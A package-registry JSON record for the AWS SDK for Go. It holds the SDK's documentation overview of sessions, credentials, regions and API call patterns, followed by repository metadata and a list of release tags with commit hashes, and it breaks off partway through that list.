{"id":2004,"name":"github.com/aws/aws-sdk-go","ecosystem":"go","repository_url":"https://github.com/aws/aws-sdk-go","issues_count":3434,"created_at":"2025-06-06T15:01:54.843Z","updated_at":"2025-06-06T15:01:54.843Z","purl":"pkg:golang/github.com/aws/aws-sdk-go","metadata":{"id":3492681,"name":"github.com/aws/aws-sdk-go","ecosystem":"go","description":"Package sdk is the official AWS SDK for the Go programming language.\n\nThe AWS SDK for Go provides APIs and utilities that developers can use to\nbuild Go applications that use AWS services, such as Amazon Elastic Compute\nCloud (Amazon EC2) and Amazon Simple Storage Service (Amazon S3).\n\nThe SDK removes the complexity of coding directly against a web service\ninterface. It hides a lot of the lower-level plumbing, such as authentication,\nrequest retries, and error handling.\n\nThe SDK also includes helpful utilities on top of the AWS APIs that add additional\ncapabilities and functionality. For example, the Amazon S3 Download and Upload\nManager will automatically split up large objects into multiple parts and\ntransfer them concurrently.\n\nSee the s3manager package documentation for more information.\nhttps://docs.aws.amazon.com/sdk-for-go/api/service/s3/s3manager/\n\nCheckout the Getting Started Guide and API Reference Docs detailed the SDK's\ncomponents and details on each AWS client the SDK supports.\n\nThe Getting Started Guide provides examples and detailed description of how\nto get setup with the SDK.\nhttps://docs.aws.amazon.com/sdk-for-go/v1/developer-guide/welcome.html\n\nThe API Reference Docs include a detailed breakdown of the SDK's components\nsuch as utilities and AWS clients. Use this as a reference of the Go types\nincluded with the SDK, such as AWS clients, API operations, and API parameters.\nhttps://docs.aws.amazon.com/sdk-for-go/api/\n\nThe SDK is composed of two main components, SDK core, and service clients.\nThe SDK core packages are all available under the aws package at the root of\nthe SDK. Each client for a supported AWS service is available within its own\npackage under the service folder at the root of the SDK.\n\naws - SDK core, provides common shared types such as Config, Logger,\nand utilities to make working with API parameters easier.\n\nawserr - Provides the error interface that the SDK will use for all\nerrors that occur in the SDK's processing. This includes service API\nresponse errors as well. The Error type is made up of a code and message.\nCast the SDK's returned error type to awserr.Error and call the Code\nmethod to compare returned error to specific error codes. See the package's\ndocumentation for additional values that can be extracted such as RequestId.\n\ncredentials - Provides the types and built in credentials providers\nthe SDK will use to retrieve AWS credentials to make API requests with.\nNested under this folder are also additional credentials providers such as\nstscreds for assuming IAM roles, and ec2rolecreds for EC2 Instance roles.\n\nendpoints - Provides the AWS Regions and Endpoints metadata for the SDK.\nUse this to lookup AWS service endpoint information such as which services\nare in a region, and what regions a service is in. Constants are also provided\nfor all region identifiers, e.g UsWest2RegionID for \"us-west-2\".\n\nsession - Provides initial default configuration, and load\nconfiguration from external sources such as environment and shared\ncredentials file.\n\nrequest - Provides the API request sending, and retry logic for the SDK.\nThis package also includes utilities for defining your own request\nretryer, and configuring how the SDK processes the request.\n\nservice - Clients for AWS services. All services supported by the SDK are\navailable under this folder.\n\nThe SDK includes the Go types and utilities you can use to make requests to\nAWS service APIs. Within the service folder at the root of the SDK you'll find\na package for each AWS service the SDK supports. All service clients follows\na common pattern of creation and usage.\n\nWhen creating a client for an AWS service you'll first need to have a Session\nvalue constructed. The Session provides shared configuration that can be shared\nbetween your service clients. When service clients are created you can pass\nin additional configuration via the aws.Config type to override configuration\nprovided by in the Session to create service client instances with custom\nconfiguration.\n\nOnce the service's client is created you can use it to make API requests the\nAWS service. These clients are safe to use concurrently.\n\nIn the AWS SDK for Go, you can configure settings for service clients, such\nas the log level and maximum number of retries. Most settings are optional;\nhowever, for each service client, you must specify a region and your credentials.\nThe SDK uses these values to send requests to the correct AWS region and sign\nrequests with the correct credentials. You can specify these values as part\nof a session or as environment variables.\n\nSee the SDK's configuration guide for more information.\nhttps://docs.aws.amazon.com/sdk-for-go/v1/developer-guide/configuring-sdk.html\n\nSee the session package documentation for more information on how to use Session\nwith the SDK.\nhttps://docs.aws.amazon.com/sdk-for-go/api/aws/session/\n\nSee the Config type in the aws package for more information on configuration\noptions.\nhttps://docs.aws.amazon.com/sdk-for-go/api/aws/#Config\n\nWhen using the SDK you'll generally need your AWS credentials to authenticate\nwith AWS services. The SDK supports multiple methods of supporting these\ncredentials. By default the SDK will source credentials automatically from\nits default credential chain. See the session package for more information\non this chain, and how to configure it. The common items in the credential\nchain are the following:\n\nEnvironment Credentials - Set of environment variables that are useful\nwhen sub processes are created for specific roles.\n\nShared Credentials file (~/.aws/credentials) - This file stores your\ncredentials based on a profile name and is useful for local development.\n\nEC2 Instance Role Credentials - Use EC2 Instance Role to assign credentials\nto application running on an EC2 instance. This removes the need to manage\ncredential files in production.\n\nCredentials can be configured in code as well by setting the Config's Credentials\nvalue to a custom provider or using one of the providers included with the\nSDK to bypass the default credential chain and use a custom one. This is\nhelpful when you want to instruct the SDK to only use a specific set of\ncredentials or providers.\n\nThis example creates a credential provider for assuming an IAM role, \"myRoleARN\"\nand configures the S3 service client to use that role for API requests.\n\nSee the credentials package documentation for more information on credential\nproviders included with the SDK, and how to customize the SDK's usage of\ncredentials.\nhttps://docs.aws.amazon.com/sdk-for-go/api/aws/credentials\n\nThe SDK has support for the shared configuration file (~/.aws/config). This\nsupport can be enabled by setting the environment variable, \"AWS_SDK_LOAD_CONFIG=1\",\nor enabling the feature in code when creating a Session via the\nOption's SharedConfigState parameter.\n\nIn addition to the credentials you'll need to specify the region the SDK\nwill use to make AWS API requests to. In the SDK you can specify the region\neither with an environment variable, or directly in code when a Session or\nservice client is created. The last value specified in code wins if the region\nis specified multiple ways.\n\nTo set the region via the environment variable set the \"AWS_REGION\" to the\nregion you want to the SDK to use. Using this method to set the region will\nallow you to run your application in multiple regions without needing additional\ncode in the application to select the region.\n\nThe endpoints package includes constants for all regions the SDK knows. The\nvalues are all suffixed with RegionID. These values are helpful, because they\nreduce the need to type the region string manually.\n\nTo set the region on a Session use the aws package's Config struct parameter\nRegion to the AWS region you want the service clients created from the session to\nuse. This is helpful when you want to create multiple service clients, and\nall of the clients make API requests to the same region.\n\nSee the endpoints package for the AWS Regions and Endpoints metadata.\nhttps://docs.aws.amazon.com/sdk-for-go/api/aws/endpoints/\n\nIn addition to setting the region when creating a Session you can also set\nthe region on a per service client bases. This overrides the region of a\nSession. This is helpful when you want to create service clients in specific\nregions different from the Session's region.\n\nSee the Config type in the aws package for more information and additional\noptions such as setting the Endpoint, and other service client configuration options.\nhttps://docs.aws.amazon.com/sdk-for-go/api/aws/#Config\n\nOnce the client is created you can make an API request to the service.\nEach API method takes a input parameter, and returns the service response\nand an error. The SDK provides methods for making the API call in multiple ways.\n\nIn this list we'll use the S3 ListObjects API as an example for the different\nways of making API requests.\n\nListObjects - Base API operation that will make the API request to the service.\n\nListObjectsRequest - API methods suffixed with Request will construct the\nAPI request, but not send it. This is also helpful when you want to get a\npresigned URL for a request, and share the presigned URL instead of your\napplication making the request directly.\n\nListObjectsPages - Same as the base API operation, but uses a callback to\nautomatically handle pagination of the API's response.\n\nListObjectsWithContext - Same as base API operation, but adds support for\nthe Context pattern. This is helpful for controlling the canceling of in\nflight requests. See the Go standard library context package for more\ninformation. This method also takes request package's Option functional\noptions as the variadic argument for modifying how the request will be\nmade, or extracting information from the raw HTTP response.\n\nListObjectsPagesWithContext - same as ListObjectsPages, but adds support for\nthe Context pattern. Similar to ListObjectsWithContext this method also\ntakes the request package's Option function option types as the variadic\nargument.\n\nIn addition to the API operations the SDK also includes several higher level\nmethods that abstract checking for and waiting for an AWS resource to be in\na desired state. In this list we'll use WaitUntilBucketExists to demonstrate\nthe different forms of waiters.\n\nWaitUntilBucketExists. - Method to make API request to query an AWS service for\na resource's state. Will return successfully when that state is accomplished.\n\nWaitUntilBucketExistsWithContext - Same as WaitUntilBucketExists, but adds\nsupport for the Context pattern. In addition these methods take request\npackage's WaiterOptions to configure the waiter, and how underlying request\nwill be made by the SDK.\n\nThe API method will document which error codes the service might return for\nthe operation. These errors will also be available as const strings prefixed\nwith \"ErrCode\" in the service client's package. If there are no errors listed\nin the API's SDK documentation you'll need to consult the AWS service's API\ndocumentation for the errors that could be returned.\n\nPagination helper methods are suffixed with \"Pages\", and provide the\nfunctionality needed to round trip API page requests. Pagination methods\ntake a callback function that will be called for each page of the API's response.\n\nWaiter helper methods provide the functionality to wait for an AWS resource\nstate. These methods abstract the logic needed to to check the state of an\nAWS resource, and wait until that resource is in a desired state. The waiter\nwill block until the resource is in the state that is desired, an error occurs,\nor the waiter times out. If a resource times out the error code returned will\nbe request.WaiterResourceNotReadyErrorCode.\n\nThis example shows a complete working Go file which will upload a file to S3\nand use the Context pattern to implement timeout logic that will cancel the\nrequest if it takes too long. This example highlights how to use sessions,\ncreate a service client, make a request, handle the error, and process the\nresponse.","homepage":"https://github.com/aws/aws-sdk-go","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/aws/aws-sdk-go","keywords_array":[],"namespace":"github.com/aws","versions_count":1787,"first_release_published_at":"2015-06-03T17:07:40.000Z","latest_release_published_at":"2024-07-30T18:34:53.000Z","latest_release_number":"v1.55.5","last_synced_at":"2024-12-12T18:33:11.174Z","created_at":"2022-04-10T19:11:34.119Z","updated_at":"2025-02-14T02:02:56.183Z","registry_url":"https://pkg.go.dev/github.com/aws/aws-sdk-go","install_command":"go get github.com/aws/aws-sdk-go","documentation_url":"https://pkg.go.dev/github.com/aws/aws-sdk-go#section-documentation","metadata":{},"repo_metadata":{"uuid":"27576132","full_name":"aws/aws-sdk-go","owner":"aws","description":"AWS SDK for the Go programming language.","archived":false,"fork":false,"pushed_at":"2023-03-10T19:21:45.000Z","size":337183,"stargazers_count":8215,"open_issues_count":69,"forks_count":2028,"subscribers_count":251,"default_branch":"main","last_synced_at":"2023-03-13T14:08:30.526Z","etag":null,"topics":["aws","aws-sdk","go"],"latest_commit_sha":null,"homepage":"http://aws.amazon.com/sdk-for-go/","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"logo_url":null,"metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.txt","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-12-05T05:29:41.000Z","updated_at":"2023-03-13T07:46:02.000Z","dependencies_parsed_at":"2023-01-14T13:30:51.678Z","dependency_job_id":null,"html_url":"https://github.com/aws/aws-sdk-go","commit_stats":null,"repository_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Faws-sdk-go","tags_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Faws-sdk-go/tags","manifests_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Faws-sdk-go/manifests","owner_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/aws","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":108921946,"host_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names"},"owner_record":{"login":"aws","name":"Amazon Web Services","uuid":"2232217","kind":"organization","description":"","email":null,"website":"https://amazon.com/aws","location":"Seattle, WA","twitter":null,"company":null,"avatar_url":"https://avatars.githubusercontent.com/u/2232217?v=4","repositories_count":338,"last_synced_at":"2023-02-19T20:57:59.812Z","metadata":{"has_sponsors_listing":false},"owner_url":"http://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/aws"},"tags":[{"name":"v1.3.1","sha":"5f1600d670430842d2d8f8c2c4652b6236b29026","kind":"commit","published_at":"2016-08-04T22:13:38.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.3.1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.3.1"},{"name":"v1.3.0","sha":"eb0af7afd2cea3310a21a13e1868644991c5af92","kind":"commit","published_at":"2016-08-02T23:38:49.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.3.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.3.0"},{"name":"v1.2.10","sha":"3b8c171554fc7d4fc53b87e25d4926a9e7495c2e","kind":"commit","published_at":"2016-07-29T00:51:21.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.10","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.10"},{"name":"v.1.2.9","sha":"8c81b11287fe3d1ae97e8d8c2331a8573b603f1d","kind":"commit","published_at":"2016-07-28T23:24:18.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v.1.2.9","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v.1.2.9"},{"name":"v1.2.8","sha":"1c3ed3c2f213adcdd1c6784793c81a27f9d2dca0","kind":"commit","published_at":"2016-07-26T20:26:18.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.8","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.8"},{"name":"v1.2.7","sha":"565027b24171359f23f883d0fc48c228cdde301d","kind":"commit","published_at":"2016-07-21T22:15:38.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.7","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.7"},{"name":"v1.2.6","sha":"f8553d0e791b2d81406261a38be4fc0ebad0b6e0","kind":"commit","published_at":"2016-07-19T17:28:52.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.6","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.6"},{"name":"v1.2.5","sha":"3c37d29820480639ff03fd66df00a0f27984f88d","kind":"commit","published_at":"2016-07-13T21:13:24.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.5","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.5"},{"name":"v1.2.4","sha":"90dec2183a5f5458ee79cbaf4b8e9ab910bc81a6","kind":"commit","published_at":"2016-07-08T00:08:20.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.4","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.4"},{"name":"v1.2.3","sha":"333fcdc9874ea63fbdb3176e12ffa04b5ec44f5a","kind":"commit","published_at":"2016-07-05T22:03:21.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.3","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.3"},{"name":"v1.2.2","sha":"caee6e866bf437a6bef0777a3bf141cdd3aa022d","kind":"commit","published_at":"2016-06-30T21:40:16.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.2","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.2"},{"name":"v1.2.1","sha":"090ac38629ae46c5ccc576820f7516e2f2389109","kind":"commit","published_at":"2016-06-28T23:51:42.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.1"},{"name":"v1.2.0","sha":"b85eaebe3c12e8db01a7c26882457c5c51100471","kind":"commit","published_at":"2016-06-24T00:10:50.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.2.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.2.0"},{"name":"v1.1.36","sha":"8f2725740345a0561fa09669f5f75f905404ef8b","kind":"commit","published_at":"2016-06-21T21:50:58.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.36","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.36"},{"name":"v1.1.35","sha":"d3b6d25135b4e09ecd39ea3c2a5cad35279b0515","kind":"commit","published_at":"2016-06-14T21:42:08.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.35","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.35"},{"name":"v1.1.34","sha":"64c371362a7b5ecafa2d7cdf90d19aba7343ae02","kind":"commit","published_at":"2016-06-09T20:54:28.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.34","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.34"},{"name":"v1.1.33","sha":"d2325e41fca90352e50602f08f7113348263bb5f","kind":"commit","published_at":"2016-06-07T21:17:11.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.33","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.33"},{"name":"v1.1.32","sha":"7878b9c08027abca987ff7e628e69f73d5a348b5","kind":"commit","published_at":"2016-06-02T21:43:38.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.32","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.32"},{"name":"v1.1.31","sha":"4852ad3b52efba1b86f1c45d675124c5cbf16031","kind":"commit","published_at":"2016-05-26T20:48:27.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.31","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.31"},{"name":"v1.1.30","sha":"073693d6cf3e1a74b323877172a5392f3e56bc97","kind":"commit","published_at":"2016-05-24T17:51:21.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.30","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.30"},{"name":"v1.1.29","sha":"83c400dd354759bdb2fb49f9c6e53cee3e0c9484","kind":"commit","published_at":"2016-05-19T20:56:12.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.29","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.29"},{"name":"v1.1.28","sha":"501dd3226ceb6863d89d82e9f7c9f59a43efb008","kind":"commit","published_at":"2016-05-18T21:15:13.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.28","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.28"},{"name":"v1.1.27","sha":"8fd3586fd7d0a1ae87031b09da0d214588460e51","kind":"commit","published_at":"2016-05-17T22:38:26.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.27","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.27"},{"name":"v1.1.26","sha":"d0b0d5a4be6b816888caa9f8bfd2d0fc4e42a28d","kind":"commit","published_at":"2016-05-12T22:02:53.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.26","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.26"},{"name":"v1.1.25","sha":"02ee239c4ddbc6750fd0c3b5b5728b2b33aa92b4","kind":"commit","published_at":"2016-05-10T20:56:32.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.25","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.25"},{"name":"v1.1.24","sha":"d85fa529a99a833067e11c0a838b9db7a5d5ea71","kind":"commit","published_at":"2016-05-05T20:14:52.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.24","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.24"},{"name":"v1.1.23","sha":"2cc71659118a868dc7544a7ef0808eb42d487011","kind":"commit","published_at":"2016-05-03T21:45:29.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.23","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.23"},{"name":"v1.1.22","sha":"1cddc01850d633e04a23d038fd2843992c383bda","kind":"commit","published_at":"2016-04-28T20:07:45.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.22","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.22"},{"name":"v1.1.21","sha":"7b35a1da3aa511856df95812d2851c1351e84cd2","kind":"commit","published_at":"2016-04-26T21:13:22.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.21","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.21"},{"name":"v1.1.20","sha":"965c78a34d6fdf13a1788b96340c95edc548f553","kind":"commit","published_at":"2016-04-21T20:59:28.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.20","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.20"},{"name":"v1.1.19","sha":"5a13d507649a7f53fd52aa560a592a4ca69d7324","kind":"commit","published_at":"2016-04-19T17:47:10.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.19","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.19"},{"name":"v1.1.18","sha":"188bbc645efb550a8d59d343b23e2b9a9b87a2f9","kind":"commit","published_at":"2016-04-11T17:13:44.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.18","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.18"},{"name":"v1.1.17","sha":"f5651cd9ccec07bc7cdca35ef3ad54f90883b341","kind":"commit","published_at":"2016-04-08T00:00:54.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.17","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.17"},{"name":"v1.1.16","sha":"6f62fc3ff9aa98c629b350376825cda566658d75","kind":"commit","published_at":"2016-04-06T00:19:17.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.16","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.16"},{"name":"v1.1.15","sha":"e7cf1e5986499eea7d4a87868f1eb578c8f2045a","kind":"commit","published_at":"2016-03-29T22:17:24.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.15","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.15"},{"name":"v1.1.14","sha":"6876e9922ff299adf36e43e04c94820077968b3b","kind":"commit","published_at":"2016-03-24T20:55:47.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.14","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.14"},{"name":"v1.1.13","sha":"f0748927a5d7568334ff0858de06c2812da89d6a","kind":"commit","published_at":"2016-03-22T20:54:41.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.13","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.13"},{"name":"v1.1.12","sha":"4da0bec8953a0a540f391930a946917b12a95671","kind":"commit","published_at":"2016-03-17T23:54:49.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.12","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.12"},{"name":"v1.1.11","sha":"c38eb9eaa3b9782b6a9dc9097911a014680aab6c","kind":"commit","published_at":"2016-03-15T21:58:49.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.11","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.11"},{"name":"v1.1.10","sha":"4151ef572710e04d25d9385114b33847ba6a923a","kind":"commit","published_at":"2016-03-11T00:11:57.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.10","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.10"},{"name":"v1.1.9","sha":"2e7cf03d7f5c8a4b4c9f7341ddf1e13102845cf2","kind":"commit","published_at":"2016-03-08T23:04:44.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.9","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.9"},{"name":"v1.1.8","sha":"0c3b505eddd9781c460b0ca059522a0725f102fc","kind":"commit","published_at":"2016-03-03T22:09:41.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.8","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.8"},{"name":"v1.1.7","sha":"13a12060f716145019378a10e2806c174356b857","kind":"commit","published_at":"2016-03-01T22:14:50.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.7","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.7"},{"name":"v1.1.6","sha":"aac89266a9bc98ecbf440bb675e9dc95a94d8dc6","kind":"commit","published_at":"2016-02-26T00:26:16.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.6","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.6"},{"name":"v1.1.5","sha":"e4be72e584418dc0ff2af22ae247095143a7f258","kind":"commit","published_at":"2016-02-23T20:53:04.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.5","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.5"},{"name":"v1.1.4","sha":"d17da62685915c25ab5b429b1d1e5b67faa98ac2","kind":"commit","published_at":"2016-02-19T00:28:33.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.4","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.4"},{"name":"v1.1.3","sha":"72440a9c5a884936f1c679591fcf04e31a9b772a","kind":"commit","published_at":"2016-02-16T22:36:47.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.3","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.3"},{"name":"v1.1.2","sha":"8041be5461786460d86b4358305fbdf32d37cfb2","kind":"commit","published_at":"2016-02-12T00:23:28.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.2","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.2"},{"name":"v1.1.1","sha":"0d8e5fdff6a7f73e2c8b84c02330c3c030650b82","kind":"commit","published_at":"2016-02-09T22:51:50.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.1"},{"name":"v1.1.0","sha":"be2ec39e520e3c4088c0c6288055bdc8184a89ee","kind":"commit","published_at":"2016-01-28T20:02:35.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.1.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.1.0"},{"name":"v1.0.11","sha":"f22f230de2ce5d5bd15c415fb72d30a77931ac56","kind":"commit","published_at":"2016-01-21T21:38:05.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.11","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.11"},{"name":"v1.0.10","sha":"9ec7da8e4a0ddb21abc7137529e19fdf74f2bd61","kind":"commit","published_at":"2016-01-19T23:09:37.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.10","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.10"},{"name":"v1.0.9","sha":"c4c1a1a2a076858fe18b2be674d833c796c45b09","kind":"commit","published_at":"2016-01-14T23:10:23.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.9","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.9"},{"name":"v1.0.8","sha":"c924893c38ecc04b18d7aab8a7aa561cb8b4c4cc","kind":"commit","published_at":"2016-01-12T21:17:57.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.8","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.8"},{"name":"v1.0.7","sha":"bf2f8fe7f45e68017086d069498638893feddf64","kind":"commit","published_at":"2015-12-21T19:30:48.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.7","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.7"},{"name":"v1.0.6","sha":"18177cad2597e3cac4173b4f267b784abdb3c854","kind":"commit","published_at":"2015-12-17T21:24:16.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.6","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.6"},{"name":"v1.0.5","sha":"9e7816464bb6044ae17fff44ce59387d2658e2cb","kind":"commit","published_at":"2015-12-15T23:30:49.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.5","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.5"},{"name":"v1.0.4","sha":"999b1591218c36d5050d1ba7266eba956e65965f","kind":"commit","published_at":"2015-12-08T20:45:36.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.4","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.4"},{"name":"v1.0.3","sha":"d4677067b535e7a06201ce491b41f4b73dcc73a9","kind":"commit","published_at":"2015-12-04T01:21:26.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.3","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.3"},{"name":"v1.0.2","sha":"9d7bc2d6ca2ada0468f705f0e9725ca97f8550c8","kind":"commit","published_at":"2015-11-24T03:39:42.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.2","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.2"},{"name":"v1.0.1","sha":"1a51a09ce306f2acbc440e32a8d9d26c95c729c0","kind":"commit","published_at":"2015-11-24T00:45:44.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.1"},{"name":"v1.0.0","sha":"abb928e07c4108683d6b4d0b6ca08fe6bc0eee5f","kind":"commit","published_at":"2015-11-19T21:49:14.000Z","download_url"